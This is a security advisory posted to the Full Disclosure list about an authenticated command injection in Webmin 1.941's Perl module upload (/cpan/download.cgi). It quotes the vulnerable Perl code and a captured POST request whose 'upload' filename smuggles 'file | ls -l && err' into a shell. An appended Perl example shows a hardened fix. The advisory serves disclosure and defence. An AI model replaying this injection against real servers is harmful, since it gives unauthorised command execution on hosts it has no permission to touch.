Date: Wed, 6 May 2020 08:47:23 +0200
From: raki ben hamouda <>
Subject: [FD] Webmin (Upload Module) Remote Command Injection Vulnerability

Document Title:
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability

Common Vulnerability Scoring System:

Vulnerability Class:
Command Injection

Current Estimated Price:
2.000€ - 3.000€

Affected Product(s):

Exploitation Technique:

Severity Level:

Technical Details & Description:
A remote authenticated Command Injection vulnerability has been discovered
in the official Webmin product.
The security vulnerability allows a remote attacker with only permission to
"Install Module Perl Component" to execute arbitrary Operating System Commands.
This is due to no check being performed on the user-input "upload" parameter
when it is passed to the open() Perl function, causing execution of any command.

The vulnerability is located in the `/cpan/download.cgi` module and the
`upload` parameter of the module name to install.

The security risk of the arbitrary RCE vulnerability is estimated as High
with a CVSS (Common Vulnerability Scoring System) count of 8.5.
Exploitation of the RCE web vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

## When digging in the code:

I needed only to reach this line of code to make it work:

    &install_error(&text('download_etar', "<tt>$tar</tt>"));

However, passing user input directly to open() is not a solution; this
also includes all of these lines:

    open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
    system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
    system("$cmd >/dev/null 2>&1 </dev/null");
    %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload

Server version

Proof of Concept (PoC):
The security vulnerability can be exploited by remote attackers with a
low-privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability, follow the
provided information and steps below to continue.

1- The attacker must have permission for the Install Perl Modules component.
2- Go to "Others" -> "Perl Modules" -> "Install Modules" -> select 'From Uploaded
File' -> pick any file.
3- The attacker intercepts the request that follows:

--- PoC Session Logs [POST] ---

POST /cpan/download.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 682
Connection: close
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

Content-Disposition: form-data; name="cpan"

Content-Disposition: form-data; name="local"

Content-Disposition: form-data; name="source"

Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
Content-Type: [nothing here]

[Nothing Here]
Content-Disposition: form-data; name="url"


4- Modify the "upload" parameter with the string: "file | ls -l && err"

## Successfully reproduced the vulnerability.

Sent through the Full Disclosure mailing list
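The advisory's point that an interpolated string must never reach open() in its pipe form, as an added example in Perl (not Webmin's own code): the quoted two-argument open() beside a hardened version that allowlists the upload name and uses the list form of open(), which runs tar without a shell. It assumes a tar binary on PATH; the archive, the file inside it and the tested names are constructed for the demo.

```perl
# Added example, not Webmin's code: the interpolated two-argument open()
# quoted in the advisory beside a hardened version that keeps the upload
# name away from /bin/sh. Needs only core Perl modules and a tar binary.
use strict;
use warnings;
use File::Temp qw(tempdir);

# VULNERABLE (the pattern quoted in the advisory): the trailing "|" makes
# open() hand the interpolated string to a shell, so $pfile can carry
# commands. Kept as a string here and never executed.
sub vulnerable_command {
    my ($pfile) = @_;
    return "( gunzip -c $pfile | tar tf - ) 2>&1 |";
}

# HARDENED step 1: accept only what a tarball file name needs. Path
# separators, "..", spaces and shell metacharacters are all rejected.
sub safe_name {
    my ($name) = @_;
    return undef unless defined $name && $name =~ /\A[A-Za-z0-9._-]+\z/;
    return undef if $name =~ /\.\./;
    return $name;
}

# HARDENED step 2: the list form of open() passes argv straight to tar,
# so no shell is involved and metacharacters in the path are inert.
sub list_tar_contents {
    my ($dir, $name) = @_;
    my $clean = safe_name($name) or die "rejected upload name '$name'\n";
    open(my $tar, '-|', 'tar', 'tzf', "$dir/$clean")
        or die "cannot run tar: $!\n";
    chomp(my @entries = <$tar>);
    close($tar);
    return @entries;
}

# Constructed demo: build a tiny archive, then try a benign name and the
# injection string from the advisory against both code paths.
my $dir = tempdir(CLEANUP => 1);
open(my $fh, '>', "$dir/hello.txt") or die $!;
print $fh "hi\n"; close($fh);
system('tar', 'czf', "$dir/module-1.0.tar.gz", '-C', $dir, 'hello.txt') == 0
    or die "tar failed\n";
for my $name ('module-1.0.tar.gz', 'file | ls -l && err') {
    print "shell string the vulnerable code would run: ",
          vulnerable_command($name), "\n";
    my @out = eval { list_tar_contents($dir, $name) };
    print $@ ? "hardened: $@" : "hardened: listed @out\n";
}
```

The benign name lists `hello.txt`; the injected name is rejected by `safe_name` before any process is spawned, and even a name that slipped through would reach tar as a single argv element rather than shell text.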